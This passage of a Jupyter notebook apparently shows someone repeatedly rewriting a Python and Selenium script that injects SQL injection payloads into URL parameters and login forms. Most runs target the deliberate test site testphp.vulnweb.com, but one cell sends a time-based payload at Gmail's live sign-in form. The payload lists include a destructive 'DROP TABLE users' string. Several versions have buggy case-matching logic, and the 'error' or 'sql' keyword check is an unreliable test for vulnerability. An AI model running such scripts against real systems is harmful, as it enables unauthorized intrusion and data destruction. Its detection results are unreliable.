            print(f"Input Name: {input_tag['name']}, Type: {input_tag['type']}, Value: {input_tag['value']}")
        
        # Test for SQL Injection on this form
        test_sqli_in_form(url, form)

if __name__ == "__main__":
    main()


Enter the URL to scan for SQL Injection:  https://mail.google.com/mail/


[*] Testing URL for SQL Injection: https://mail.google.com/mail/
[*] No query parameters found in URL.
[+] Found 2 form(s) on https://mail.google.com/mail/

Form #1 Details:
Action: /v3/signin/identifier?continue=https://mail.google.com/mail/u/0/&dsh=S2134129371:1745841266814569&emr=1&flowEntry=ServiceLogin&flowName=WebLiteSignIn&followup=https://mail.google.com/mail/u/0/&ifkv=ASKV5MiE41ritBjdd7y_mwmLINIVc042N9t83D3AJljYdpZtfYvS6prkAGxFFf1LumljO_XrYxu2vg&osid=1&service=mail
Method: post
Input Name: identifier, Type: email, Value: 
Input Name: hiddenPassword, Type: password, Value: 
Input Name: usi, Type: hidden, Value: S2134129371:1745841266814569
Input Name: domain, Type: hidden, Value: 
Input Name: region, Type: hidden, Value: PK
Input Name: , Type: hidden, Value: 
Input Name: bgresponse, Type: hidden, Value: js_disabled
Input Name: at, Type: hidden, Value: ACOC1zDa9EgkmIPI55BGcE_lczE7:1745841267003
[*] Testing payload: 1' AND SLEEP(5) -- - on https://mail.google.com/v3/signin/identi

In [73]:
!pip install selenium


  Using cached trio_websocket-0.12.2-py3-none-any.whl.metadata (5.1 kB)
  Using cached attrs-25.3.0-py3-none-any.whl.metadata (10 kB)
  Using cached outcome-1.3.0.post0-py2.py3-none-any.whl.metadata (2.6 kB)
  Using cached wsproto-1.2.0-py3-none-any.whl.metadata (5.6 kB)
   ---------------------------------------- 0.0/9.4 MB ? eta -:--:--
   ---------------------------------------- 0.0/9.4 MB ? eta -:--:--
   - -------------------------------------- 0.3/9.4 MB ? eta -:--:--
   ----- ---------------------------------- 1.3/9.4 MB 3.5 MB/s eta 0:00:03
   ---------- ----------------------------- 2.4/9.4 MB 4.5 MB/s eta 0:00:02
   -------------- ------------------------- 3.4/9.4 MB 4.4 MB/s eta 0:00:02
   -------------- ------------------------- 3.4/9.4 MB 4.4 MB/s eta 0:00:02
   -------------- ------------------------- 3.4/9.4 MB 4.4 MB/s eta 0:00:02
   -------------------- ------------------- 4.7/9.4 MB 3.1 MB/s eta 0:00:02
   -------------------- ------------------- 4.7/9.4 MB 3.1 MB/s e

In [87]:
import requests
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
import time

# Function to perform SQL Injection test
def test_sql_injection(url):
    # List of common SQL injection payloads to test
    payloads = [
        "' OR 1=1 --",
        "' OR 'a'='a",
        "' OR 'x'='x' --",
        '" OR 1=1 --',
        '" OR "a"="a"',
        "' OR 1=1#"
    ]
    
    # Test each payload
    for payload in payloads:
        test_url = f"{url}?id={payload}"
        response = requests.get(test_url)
        
        if response.status_code == 200:
            if "error" in response.text.lower() or "sql" in response.text.lower():
                print(f"Potential SQL Injection detected with payload: {payload}")
            else:
                print(f"No SQL injection detected with payload: {payload}")
        else:
            print(f"Error accessing {test_url} - Status Code: {response.status_code}")

# Function to scrape the page for potential vulnerabilities
def scrape_page(url):
    response = requests.get(url)
    if response.status_code == 200:
        soup = BeautifulSoup(response.text, 'html.parser')
        # Looking for common forms where injection might happen
        forms = soup.find_all('form')
        if forms:
            print(f"Found {len(forms)} forms on the page.")
            for form in forms:
                action = form.get('action')
                print(f"Form action: {action}")
                # You can extend this by submitting different payloads into form fields here
        else:
            print("No forms found on the page.")
    else:
        print(f"Failed to retrieve page content from {url}. Status Code: {response.status_code}")


        print(f"Error locating elements: {str(e)}")
        driver.quit()
        return

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time

def selenium_test(url):
    # Initialize the Selenium WebDriver (Chrome in this case)
    driver = webdriver.Chrome()

    # Open the URL in the browser
    driver.get(url)
    time.sleep(2)  # Let the page load for 2 seconds

    # Get the page title
    page_title = driver.title
    print(f"Page Title: {page_title}")

    # SQL Injection Payloads
    payloads = [
        "' OR 1=1 --",
        "' OR 'a'='a",
        '" OR 1=1 --',
        '" OR "a"="a"',
        "' OR 1=1#",
        "'; DROP TABLE users --"
    ]

    # Try finding the username and password fields dynamically
    username_field = None
    password_field = None

    # Search for all input fields and try to identify username and password fields
    input_fields = driver.find_elements(By.TAG_NAME, "input")

    for field in input_fields:
        field_name = field.get_attribute("name").lower() if field.get_attribute("name") else ""
        field_id = field.get_attribute("id").lower() if field.get_attribute("id") else ""
        field_placeholder = field.get_attribute("placeholder").lower() if field.get_attribute("placeholder") else ""
        field_type = field.get_attribute("type").lower() if field.get_attribute("type") else ""

        # Heuristic: Identify common patterns for username and password fields
        if any(keyword in field_name for keyword in ['username', 'email', 'login']) or \
           any(keyword in field_id for keyword in ['username', 'email', 'login']) or \
           any(keyword in field_placeholder for keyword in ['username', 'email', 'login']):
            username_field = field

        if any(keyword in field_name for keyword in ['password']) or \
           any(keyword in field_id for keyword in ['password']) or \
           any(keyword in field_placeholder for keyword in ['password']):
            password_field = field

        if field_type == "text" and username_field is None:
            username_field = field
        elif field_type == "password" and password_field is None:
            password_field = field

        if username_field and password_field:
            break

    if username_field and password_field:
        print("Username and Password fields identified successfully.")
    else:
        print("Could not identify username and password fields automatically.")
        driver.quit()
        return  # Stop if the fields are not found

    # Wait until the fields are interactable (to prevent StaleElementReferenceException)
    try:
        # Use WebDriverWait to wait for the elements to be available
        username_field = WebDriverWait(driver, 10).until(
            EC.presence_of_element_located((By.NAME, "Username"))
        )
        password_field = WebDriverWait(driver, 10).until(
            EC.presence_of_element_located((By.NAME, "Password"))
        )
    except Exception as e:
        print(f"Error locating elements: {str(e)}")
        driver.quit()
        return

    # Loop through the payloads and inject them into the fields
    for payload in payloads:
        print(f"Testing payload: {payload}")

        try:
            # Re-locate the elements before interacting (to avoid stale references)
            username_field = driver.find_element(By.NAME, "Username")
            password_field = driver.find_element(By.NAME, "Password")

            # Clear the fields before injecting new payloads
            username_field.clear()
            password_field.clear()

            # Inject the SQL payloads into the fields
            username_field.send_keys(payload)
            password_field.send_keys(payload)

            # Submit the form (simulate hitting 'Enter')
            password_field.send_keys(Keys.RETURN)
            time.sleep(2)  # Wait for the page to load/response

            # Analyze the page source for error messages indicating SQL Injection
            body_text = driver.page_source.lower()
            if "error" in body_text or "sql" in body_text:
                print(f"Potential SQL Injection vulnerability detected with payload: {payload}")
            else:
                print(f"No vulnerabilities detected with payload: {payload}")

        except StaleElementReferenceException:
            print("Stale element reference exception, re-locating elements...")
            username_field = None
            password_field = None
            input_fields = driver.find_elements(By.TAG_NAME, "input")
            for field in input_fields:
                field_name = field.get_attribute("name").lower() if field.get_attribute("name") else ""
                field_id = field.get_attribute("id").lower() if field.get_attribute("id") else ""
                field_placeholder = field.get_attribute("placeholder").lower() if field.get_attribute("placeholder") else ""
                field_type = field.get_attribute("type").lower() if field.get_attribute("type") else ""

                if any(keyword in field_name for keyword in ['username', 'email', 'login']) or \
                   any(keyword in field_id for keyword in ['username', 'email', 'login']) or \
                   any(keyword in field_placeholder for keyword in ['username', 'email', 'login']):
                    username_field = field

                if any(keyword in field_name for keyword in ['password']) or \
                   any(keyword in field_id for keyword in ['password']) or \
                   any(keyword in field_placeholder for keyword in ['password']):
                    password_field = field

                if username_field and password_field:
                    break
            continue  # Retry the loop with the newly located elements

    # Quit the driver after testing
    driver.quit()

def main():
    # Ask the user for the URL to scan
    url = input("Enter the URL to scan for vulnerabilities: ")
    
    # Perform SQL Injection Test
    print(f"Testing SQL Injection on {url}...")
    test_sql_injection(url)
    
    # Scrape the page for potential vulnerabilities
    print(f"Scraping {url} for vulnerabilities...")
    scrape_page(url)
    
    # Perform a Selenium-based test if needed
    print(f"Performing interactive Selenium test on {url}...")
    selenium_test(url)
    
if __name__ == "__main__":
    main()
    


Enter the URL to scan for vulnerabilities:    http://testphp.vulnweb.com/login.php


Testing SQL Injection on   http://testphp.vulnweb.com/login.php...
Potential SQL Injection detected with payload: ' OR 1=1 --
Potential SQL Injection detected with payload: ' OR 'a'='a
Potential SQL Injection detected with payload: ' OR 'x'='x' --
Potential SQL Injection detected with payload: " OR 1=1 --
Potential SQL Injection detected with payload: " OR "a"="a"
Potential SQL Injection detected with payload: ' OR 1=1#
Scraping   http://testphp.vulnweb.com/login.php for vulnerabilities...
Found 2 forms on the page.
Form action: userinfo.php
Form action: search.php?test=query
Performing interactive Selenium test on   http://testphp.vulnweb.com/login.php...
Page Title: login page
Username and Password fields identified successfully.
Error locating elements: Message: 
Stacktrace:
	GetHandleVerifier [0x00007FF732DFEFA5+77893]
	GetHandleVerifier [0x00007FF732DFF000+77984]
	(No symbol) [0x00007FF732BC91BA]
	(No symbol) [0x00007FF732C1F16D]
	(No symbol) [0x00007FF732C1F41C]
	(No symbol) [0x0

In [88]:
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time

def selenium_test(url):
    # Initialize the Selenium WebDriver (Chrome in this case)
    driver = webdriver.Chrome()

    # Open the URL in the browser
    driver.get(url)
    time.sleep(2)  # Let the page load for 2 seconds

    # Get the page title
    page_title = driver.title
    print(f"Page Title: {page_title}")

    # SQL Injection Payloads
    payloads = [
        "' OR 1=1 --",
        "' OR 'a'='a",
        '" OR 1=1 --',
        '" OR "a"="a"',
        "' OR 1=1#",
        "'; DROP TABLE users --"
    ]

    # Try to locate username and password fields with different attributes
    username_field = None
    password_field = None

    input_fields = driver.find_elements(By.TAG_NAME, "input")

    for field in input_fields:
        field_name = field.get_attribute("name") or ""
        field_id = field.get_attribute("id") or ""
        field_placeholder = field.get_attribute("placeholder") or ""
        field_type = field.get_attribute("type") or ""
        field_class = field.get_attribute("class") or ""

        # Check for common keywords in name, id, placeholder, and class
        if any(keyword in field_name.lower() for keyword in ['username', 'email', 'login']) or \
           any(keyword in field_id.lower() for keyword in ['username', 'email', 'login']) or \
           any(keyword in field_placeholder.lower() for keyword in ['username', 'email', 'login']) or \
           any(keyword in field_class.lower() for keyword in ['username', 'email', 'login']):
            username_field = field

        if any(keyword in field_name.lower() for keyword in ['password']) or \
           any(keyword in field_id.lower() for keyword in ['password']) or \
           any(keyword in field_placeholder.lower() for keyword in ['password']) or \
           any(keyword in field_class.lower() for keyword in ['password']):
            password_field = field

        # If fields are found, break early
        if username_field and password_field:
            break

    # If username and password fields are identified
    if username_field and password_field:
        print("Username and Password fields identified successfully.")
    else:
        print("Could not identify username and password fields automatically.")
        driver.quit()
        return  # Stop if the fields are not found

    # Wait until the fields are interactable (to prevent StaleElementReferenceException)
    try:
        # Use WebDriverWait to wait for the elements to be available
        username_field = WebDriverWait(driver, 10).until(
            EC.visibility_of_element_located((By.NAME, username_field.get_attribute('name')))
        )
        password_field = WebDriverWait(driver, 10).until(
            EC.visibility_of_element_located((By.NAME, password_field.get_attribute('name')))
        )
    except Exception as e:
        print(f"Error locating elements: {str(e)}")
        driver.quit()
        return

    # Loop through the payloads and inject them into the fields
    for payload in payloads:
        print(f"Testing payload: {payload}")

        try:
            # Clear the fields before injecting new payloads
            username_field.clear()
            password_field.clear()

            # Inject the SQL payloads into the fields
            username_field.send_keys(payload)
            password_field.send_keys(payload)

            # Submit the form (simulate hitting 'Enter')
            password_field.send_keys(Keys.RETURN)
            time.sleep(2)  # Wait for the page to load/response

            # Analyze the page source for error messages indicating SQL Injection
            body_text = driver.page_source.lower()
            if "error" in body_text or "sql" in body_text:
                print(f"Potential SQL Injection vulnerability detected with payload: {payload}")
            else:
                print(f"No vulnerabilities detected with payload: {payload}")

        except Exception as e:
            print(f"Error during payload injection: {str(e)}")

    # Quit the driver after testing
    driver.quit()

# Main function to start the test
def main():
    # Ask the user for the URL to scan
    url = input("Enter the URL to scan for vulnerabilities: ")
    
    # Perform a Selenium-based test
    print(f"Performing interactive Selenium test on {url}...")
    selenium_test(url)

if __name__ == "__main__":
    main()


Enter the URL to scan for vulnerabilities:    http://testphp.vulnweb.com/login.php


Performing interactive Selenium test on   http://testphp.vulnweb.com/login.php...
Page Title: login page
Could not identify username and password fields automatically.


In [89]:
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time

def selenium_test(url):
    # Initialize the Selenium WebDriver (Chrome in this case)
    driver = webdriver.Chrome()

    # Open the URL in the browser
    driver.get(url)
    time.sleep(2)  # Let the page load for 2 seconds

    # Get the page title
    page_title = driver.title
    print(f"Page Title: {page_title}")

    # SQL Injection Payloads
    payloads = [
        "' OR 1=1 --",
        "' OR 'a'='a",
        '" OR 1=1 --',
        '" OR "a"="a"',
        "' OR 1=1#",
        "'; DROP TABLE users --"
    ]

    # Try to locate username and password fields with different attributes
    username_field = None
    password_field = None

    # Search through labels to identify associated input fields
    labels = driver.find_elements(By.TAG_NAME, "label")
    
    for label in labels:
        label_text = label.text.strip().lower()
        
        if "username" in label_text or "email" in label_text:
            # Find the input field associated with the label
            input_field = label.find_element(By.XPATH, "following-sibling::input")
            if input_field:
                username_field = input_field

        if "password" in label_text:
            # Find the input field associated with the label
            input_field = label.find_element(By.XPATH, "following-sibling::input")
            if input_field:
                password_field = input_field

        # If both fields are found, break early
        if username_field and password_field:
            break

    # If username and password fields are identified
    if username_field and password_field:
        print("Username and Password fields identified successfully.")
    else:
        print("Could not identify username and password fields automatically.")
        driver.quit()
        return  # Stop if the fields are not found

    # Wait until the fields are interactable (to prevent StaleElementReferenceException)
    try:
        # Use WebDriverWait to wait for the elements to be available
        username_field = WebDriverWait(driver, 10).until(
            EC.visibility_of_element_located((By.NAME, username_field.get_attribute('name')))
        )
        password_field = WebDriverWait(driver, 10).until(
            EC.visibility_of_element_located((By.NAME, password_field.get_attribute('name')))
        )
    except Exception as e:
        print(f"Error locating elements: {str(e)}")
        driver.quit()
        return

    # Loop through the payloads and inject them into the fields
    for payload in payloads:
        print(f"Testing payload: {payload}")

        try:
            # Clear the fields before injecting new payloads
            username_field.clear()
            password_field.clear()

            # Inject the SQL payloads into the fields
            username_field.send_keys(payload)
            password_field.send_keys(payload)

            # Submit the form (simulate hitting 'Enter')
            password_field.send_keys(Keys.RETURN)
            time.sleep(2)  # Wait for the page to load/response

            # Analyze the page source for error messages indicating SQL Injection
            body_text = driver.page_source.lower()
            if "error" in body_text or "sql" in body_text:
                print(f"Potential SQL Injection vulnerability detected with payload: {payload}")
            else:
                print(f"No vulnerabilities detected with payload: {payload}")

        except Exception as e:
            print(f"Error during payload injection: {str(e)}")

    # Quit the driver after testing
    driver.quit()

# Main function to start the test
def main():
    # Ask the user for the URL to scan
    url = input("Enter the URL to scan for vulnerabilities: ")
    
    # Perform a Selenium-based test
    print(f"Performing interactive Selenium test on {url}...")
    selenium_test(url)

if __name__ == "__main__":
    main()


Enter the URL to scan for vulnerabilities:    http://testphp.vulnweb.com/login.php


Performing interactive Selenium test on   http://testphp.vulnweb.com/login.php...
Page Title: login page
Could not identify username and password fields automatically.


In [92]:
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time

def selenium_test(url):
    # Initialize the Selenium WebDriver (Chrome in this case)
    driver = webdriver.Chrome()

    # Open the URL in the browser
    driver.get(url)
    time.sleep(2)  # Let the page load for 2 seconds

    # Get the page title
    page_title = driver.title
    print(f"Page Title: {page_title}")

    # SQL Injection Payloads
    payloads = [
        "' OR 1=1 --",
        "' OR 'a'='a",
        '" OR 1=1 --',
        '" OR "a"="a"',
        "' OR 1=1#",
        "'; DROP TABLE users --"
    ]

    # Try to locate username and password fields with different attributes
    username_field = None
    password_field = None

    # Check for text input and password input fields explicitly
    input_fields = driver.find_elements(By.TAG_NAME, "input")
    
    for field in input_fields:
        field_name = field.get_attribute("name").lower() if field.get_attribute("name") else ""
        field_id = field.get_attribute("id").lower() if field.get_attribute("id") else ""
        field_placeholder = field.get_attribute("placeholder").lower() if field.get_attribute("placeholder") else ""
        field_type = field.get_attribute("type").lower() if field.get_attribute("type") else ""

        # Look for fields that are text or password
        if "username" in field_name or "email" in field_name or "Username" in field_name or "login" in field_id or "username" in field_placeholder:
            if field_type == "text" or field_type == "email":
                username_field = field
        
        if "password" in field_name or "Password" in field_name or "password" in field_id or "password" in field_placeholder:
            if field_type == "password":
                password_field = field

        # If both fields are found, break early
        if username_field and password_field:
            break

    # If username and password fields are identified
    if username_field and password_field:
        print("Username and Password fields identified successfully.")
    else:
        print("Could not identify username and password fields automatically.")
        driver.quit()
        return  # Stop if the fields are not found

    # Wait until the fields are interactable (to prevent StaleElementReferenceException)
    try:
        # Use WebDriverWait to wait for the elements to be available
        username_field = WebDriverWait(driver, 10).until(
            EC.visibility_of_element_located((By.NAME, username_field.get_attribute('name')))
        )
        password_field = WebDriverWait(driver, 10).until(
            EC.visibility_of_element_located((By.NAME, password_field.get_attribute('name')))
        )
    except Exception as e:
        print(f"Error locating elements: {str(e)}")
        driver.quit()
        return

    # Loop through the payloads and inject them into the fields
    for payload in payloads:
        print(f"Testing payload: {payload}")

        try:
            # Clear the fields before injecting new payloads
            username_field.clear()
            password_field.clear()

            # Inject the SQL payloads into the fields
            username_field.send_keys(payload)
            password_field.send_keys(payload)

            # Submit the form (simulate hitting 'Enter')
            password_field.send_keys(Keys.RETURN)
            time.sleep(2)  # Wait for the page to load/response

            # Analyze the page source for error messages indicating SQL Injection
            body_text = driver.page_source.lower()
            if "error" in body_text or "sql" in body_text:
                print(f"Potential SQL Injection vulnerability detected with payload: {payload}")
            else:
                print(f"No vulnerabilities detected with payload: {payload}")

        except Exception as e:
            print(f"Error during payload injection: {str(e)}")

    # Quit the driver after testing
    driver.quit()

# Main function to start the test
def main():
    # Ask the user for the URL to scan
    url = input("Enter the URL to scan for vulnerabilities: ")
    
    # Perform a Selenium-based test
    print(f"Performing interactive Selenium test on {url}...")
    selenium_test(url)

if __name__ == "__main__":
    main()


Enter the URL to scan for vulnerabilities:    http://testphp.vulnweb.com/login.php


Performing interactive Selenium test on   http://testphp.vulnweb.com/login.php...
Page Title: login page
Could not identify username and password fields automatically.


In [94]:
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time

def selenium_test(url):
    # Initialize the Selenium WebDriver (Chrome in this case)
    driver = webdriver.Chrome()

    # Open the URL in the browser
    driver.get(url)
    time.sleep(2)  # Let the page load for 2 seconds

    # Get the page title
    page_title = driver.title
    print(f"Page Title: {page_title}")

    # SQL Injection Payloads
    payloads = [
        "' OR 1=1 --",
        "' OR 'a'='a",
        '" OR 1=1 --',
        '" OR "a"="a"',
        "' OR 1=1#",
        "'; DROP TABLE users --"
    ]

    # Try to locate username and password fields with different attributes
    username_field = None
    password_field = None

    # Check for text input and password input fields explicitly
    input_fields = driver.find_elements(By.TAG_NAME, "input")
    
    for field in input_fields:
        field_name = field.get_attribute("name") if field.get_attribute("name") else ""
        field_id = field.get_attribute("id") if field.get_attribute("id") else ""
        field_placeholder = field.get_attribute("placeholder") if field.get_attribute("placeholder") else ""
        field_type = field.get_attribute("type") if field.get_attribute("type") else ""

        # Convert to lowercase for case-insensitive comparison
        field_name = field_name.lower()
        field_id = field_id.lower()
        field_placeholder = field_placeholder.lower()

        # Look for fields that are text or password
        if "Username" in field_name or "email" in field_name or "login" in field_id or "username" in field_placeholder:
            if field_type == "text" or field_type == "email":
                username_field = field
        
        if "Password" in field_name or "password" in field_id or "password" in field_placeholder:
            if field_type == "Password":
                password_field = field

        # If both fields are found, break early
        if username_field and password_field:
            break

    # If username and password fields are identified
    if username_field and password_field:
        print("Username and Password fields identified successfully.")
    else:
        print("Could not identify username and password fields automatically.")
        driver.quit()
        return  # Stop if the fields are not found

    # Wait until the fields are interactable (to prevent StaleElementReferenceException)
    try:
        # Use WebDriverWait to wait for the elements to be available
        username_field = WebDriverWait(driver, 10).until(
            EC.visibility_of_element_located((By.NAME, username_field.get_attribute('name')))
        )
        password_field = WebDriverWait(driver, 10).until(
            EC.visibility_of_element_located((By.NAME, password_field.get_attribute('name')))
        )
    except Exception as e:
        print(f"Error locating elements: {str(e)}")
        driver.quit()
        return

    # Loop through the payloads and inject them into the fields
    for payload in payloads:
        print(f"Testing payload: {payload}")

        try:
            # Clear the fields before injecting new payloads
            username_field.clear()
            password_field.clear()

            # Inject the SQL payloads into the fields
            username_field.send_keys(payload)
            password_field.send_keys(payload)

            # Submit the form (simulate hitting 'Enter')
            password_field.send_keys(Keys.RETURN)
            time.sleep(2)  # Wait for the page to load/response

            # Analyze the page source for error messages indicating SQL Injection
            body_text = driver.page_source.lower()
            if "error" in body_text or "sql" in body_text:
                print(f"Potential SQL Injection vulnerability detected with payload: {payload}")
            else:
                print(f"No vulnerabilities detected with payload: {payload}")

        except Exception as e:
            print(f"Error during payload injection: {str(e)}")

    # Quit the driver after testing
    driver.quit()

# Main function to start the test
def main():
    # Ask the user for the URL to scan
    url = input("Enter the URL to scan for vulnerabilities: ")
    
    # Perform a Selenium-based test
    print(f"Performing interactive Selenium test on {url}...")
    selenium_test(url)

if __name__ == "__main__":
    main()


Enter the URL to scan for vulnerabilities:    http://testphp.vulnweb.com/login.php


Performing interactive Selenium test on   http://testphp.vulnweb.com/login.php...
Page Title: login page
Could not identify username and password fields automatically.


In [95]:
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time

def selenium_test(url):
    # Initialize the Selenium WebDriver (Chrome in this case)
    driver = webdriver.Chrome()

    # Open the URL in the browser
    driver.get(url)
    time.sleep(2)  # Let the page load for 2 seconds

    # Get the page title
    page_title = driver.title
    print(f"Page Title: {page_title}")

    # SQL Injection Payloads
    payloads = [
        "' OR 1=1 --",
        "' OR 'a'='a",
        '" OR 1=1 --',
        '" OR "a"="a"',
        "' OR 1=1#",
        "'; DROP TABLE users --"
    ]

    # Try to locate username and password fields with different attributes
    username_field = None
    password_field = None

    # Check for text input and password input fields explicitly
    input_fields = driver.find_elements(By.TAG_NAME, "input")
    
    for field in input_fields:
        field_name = field.get_attribute("name") if field.get_attribute("name") else ""
        field_id = field.get_attribute("id") if field.get_attribute("id") else ""
        field_placeholder = field.get_attribute("placeholder") if field.get_attribute("placeholder") else ""
        field_type = field.get_attribute("type") if field.get_attribute("type") else ""

        # Convert to lowercase for case-insensitive comparison
        field_name = field_name.lower()
        field_id = field_id.lower()
        field_placeholder = field_placeholder.lower()

        # Look for fields that are text or password
        if "Username" in field_name or "email" in field_name or "login" in field_id or "username" in field_placeholder:
            if field_type == "text" or field_type == "email":
                username_field = field
        
        if "Password" in field_name or "password" in field_id or "password" in field_placeholder:
            if field_type == "Password":
                password_field = field

        # If both fields are found, break early
        if username_field and password_field:
            break

    # If username and password fields are identified
    if username_field and password_field:
        print("Username and Password fields identified successfully.")
    else:
        print("Could not identify username and password fields automatically.")
        driver.quit()
        return  # Stop if the fields are not found

    # Wait until the fields are interactable (to prevent StaleElementReferenceException)
    try:
        # Use WebDriverWait to wait for the elements to be available
        username_field = WebDriverWait(driver, 10).until(
            EC.visibility_of_element_located((By.NAME, username_field.get_attribute('name')))
        )
        password_field = WebDriverWait(driver, 10).until(
            EC.visibility_of_element_located((By.NAME, password_field.get_attribute('name')))
        )
    except Exception as e:
        print(f"Error locating elements: {str(e)}")
        driver.quit()
        return

    # Loop through the payloads and inject them into the fields
    for payload in payloads:
        print(f"Testing payload: {payload}")

        try:
            # Clear the fields before injecting new payloads
            username_field.clear()
            password_field.clear()

            # Inject the SQL payloads into the fields
            username_field.send_keys(payload)
            password_field.send_keys(payload)

            # Submit the form (simulate hitting 'Enter')
            password_field.send_keys(Keys.RETURN)
            time.sleep(2)  # Wait for the page to load/response

            # Analyze the page source for error messages indicating SQL Injection
            body_text = driver.page_source.lower()
            if "error" in body_text or "sql" in body_text:
                print(f"Potential SQL Injection vulnerability detected with payload: {payload}")
            else:
                print(f"No vulnerabilities detected with payload: {payload}")

        except Exception as e:
            print(f"Error during payload injection: {str(e)}")

    # Quit the driver after testing
    driver.quit()

# Main function to start the test
def main():
    # Ask the user for the URL to scan
    url = input("Enter the URL to scan for vulnerabilities: ")
    
    # Perform a Selenium-based test
    print(f"Performing interactive Selenium test on {url}...")
    selenium_test(url)

if __name__ == "__main__":
    main()


Enter the URL to scan for vulnerabilities:    http://testphp.vulnweb.com/login.php


Performing interactive Selenium test on   http://testphp.vulnweb.com/login.php...
Page Title: login page
Could not identify username and password fields automatically.


In [96]:
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time

def selenium_test(url):
    driver = webdriver.Chrome()
    driver.get(url)
    time.sleep(2)  # Let the page load for 2 seconds

    page_title = driver.title
    print(f"Page Title: {page_title}")

    payloads = [
        "' OR 1=1 --",
        "' OR 'a'='a",
        '" OR 1=1 --',
        '" OR "a"="a"',
        "' OR 1=1#",
        "'; DROP TABLE users --"
    ]

    username_field = None
    password_field = None

    input_fields = driver.find_elements(By.TAG_NAME, "input")

    for field in input_fields:
        field_name = (field.get_attribute("name") or "").lower()
        field_id = (field.get_attribute("id") or "").lower()
        field_placeholder = (field.get_attribute("placeholder") or "").lower()
        field_type = (field.get_attribute("type") or "").lower()

        # Look for possible username fields
        if any(keyword in field_name for keyword in ["user", "email", "login"]) or \
           any(keyword in field_id for keyword in ["user", "email", "login"]) or \
           any(keyword in field_placeholder for keyword in ["user", "email", "login"]):
            if field_type in ["text", "email"]:
                username_field = field

        # Look for possible password fields
        if "password" in field_name or "password" in field_id or "password" in field_placeholder:
            if field_type == "password":
                password_field = field

        if username_field and password_field:
            break

    if username_field and password_field:
        print("Username and Password fields identified successfully.")
    else:
        print("Could not identify username and password fields automatically.")
        driver.quit()
        return

    try:
        username_field = WebDriverWait(driver, 10).until(
            EC.visibility_of(username_field)
        )
        password_field = WebDriverWait(driver, 10).until(
            EC.visibility_of(password_field)
        )
    except Exception as e:
        print(f"Error locating fields: {str(e)}")
        driver.quit()
        return

    for payload in payloads:
        print(f"Testing payload: {payload}")

        try:
            username_field.clear()
            password_field.clear()

            username_field.send_keys(payload)
            password_field.send_keys(payload)
            password_field.send_keys(Keys.RETURN)

            time.sleep(2)  # Allow page to load

            body_text = driver.page_source.lower()
            if "error" in body_text or "sql" in body_text or "exception" in body_text:
                print(f"Potential SQL Injection vulnerability detected with payload: {payload}")
            else:
                print(f"No vulnerabilities detected with payload: {payload}")

        except Exception as e:
            print(f"Error during payload injection: {str(e)}")

    driver.quit()

def main():
    url = input("Enter the URL to scan for vulnerabilities: ")
    print(f"Performing interactive Selenium test on {url}...")
    selenium_test(url)

if __name__ == "__main__":
    main()


Enter the URL to scan for vulnerabilities:    http://testphp.vulnweb.com/login.php


Performing interactive Selenium test on   http://testphp.vulnweb.com/login.php...
Page Title: login page
Could not identify username and password fields automatically.


In [99]:
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time

def selenium_test(url):
    driver = webdriver.Chrome()
    driver.get(url)
    time.sleep(2)  # Let the page load for 2 seconds

    page_title = driver.title
    print(f"Page Title: {page_title}")

    payloads = [
        "' OR 1=1 --",
        "' OR 'a'='a",
        '" OR 1=1 --',
        '" OR "a"="a"',
        "' OR 1=1#",
        "'; DROP TABLE users --"
    ]

    username_field = None
    password_field = None

    input_fields = driver.find_elements(By.TAG_NAME, "input")

    for field in input_fields:
        field_name = field.get_attribute("Username") or ""
        field_id = field.get_attribute("id") or ""
        field_placeholder = field.get_attribute("placeholder") or ""
        field_type = field.get_attribute("type") or ""

        # Look for possible username fields
        if any(keyword in field_name for keyword in ["user", "Username", "email", "Email", "login", "Login"]) or \
           any(keyword in field_id for keyword in ["user", "User", "email", "Email", "login", "Login"]) or \
           any(keyword in field_placeholder for keyword in ["user", "User", "email", "Email", "login", "Login"]):
            if field_type in ["text", "email", "Text", "Email"]:
                username_field = field

        # Look for possible password fields
        if any(keyword in field_name for keyword in ["password", "Password"]) or \
           any(keyword in field_id for keyword in ["password", "Password"]) or \
           any(keyword in field_placeholder for keyword in ["password", "Password"]):
            if field_type in ["password", "Password"]:
                password_field = field

        if username_field and password_field:
            break

    if username_field and password_field:
        print("Username and Password fields identified successfully.")
    else:
        print("Could not identify username and password fields automatically.")
        driver.quit()
        return

    try:
        username_field = WebDriverWait(driver, 10).until(
            EC.visibility_of(username_field)
        )
        password_field = WebDriverWait(driver, 10).until(
            EC.visibility_of(password_field)
        )
    except Exception as e:
        print(f"Error locating fields: {str(e)}")
        driver.quit()
        return

    for payload in payloads:
        print(f"Testing payload: {payload}")

        try:
            username_field.clear()
            password_field.clear()

            username_field.send_keys(payload)
            password_field.send_keys(payload)
            password_field.send_keys(Keys.RETURN)

            time.sleep(2)  # Allow page to load

            body_text = driver.page_source
            if "error" in body_text or "Error" in body_text or "sql" in body_text or "SQL" in body_text or "exception" in body_text or "Exception" in body_text:
                print(f"Potential SQL Injection vulnerability detected with payload: {payload}")
            else:
                print(f"No vulnerabilities detected with payload: {payload}")

        except Exception as e:
            print(f"Error during payload injection: {str(e)}")

    driver.quit()

def main():
